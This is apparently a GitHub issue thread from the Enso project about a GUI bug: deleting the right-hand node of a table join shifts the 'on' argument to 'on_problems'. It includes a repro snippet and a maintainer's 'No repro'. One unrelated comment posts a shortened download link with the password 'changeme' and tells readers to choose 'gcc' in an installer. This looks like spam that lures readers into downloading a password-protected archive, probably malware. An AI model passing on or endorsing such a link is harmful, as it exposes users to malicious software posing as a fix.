### ISSUE TITLE
Deleting a connection to right leads to join being mis-setup

### ISSUE THREAD

**Issue by jdunkerley** [enso-org/enso#10903]
![image](https://github.com/user-attachments/assets/44ab9d13-3cb6-4c7d-9d3e-51585543a2c1)

Start with a simple 2 table join with both `join-kind` and `on` having values.
Delete the right hand node.
The `on` argument will jump to `on_problems`.

Doesn't happen if you just disconnect only if you delete the upstream node.

**Comment by jdunkerley** [comment]
Suspect it is an issue in `app/gui2/src/components/GraphEditor/widgets/WidgetFunction.vue` in the Removing existing argument of `handleArgUpdate`,

**Comment by jdunkerley** [comment]
```
from Standard.Base import all
from Standard.Table import all
from Standard.Database import all
from Standard.AWS import all
from Standard.Google_Api import all
from Standard.Snowflake import all
import Standard.Visualization

main =
    operator1 = "Press ENTER key to create a new component"
    vector1 = operator1.words
    any1 = vector1.to_table
    any2 = any1.set (..Simple_Expr (..Name 'Value') (..Text ..Length))
    table1 = any1.join any2 ..Inner [(..Equals 'Value')]
```

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by vitvakatu** [comment]
No repro
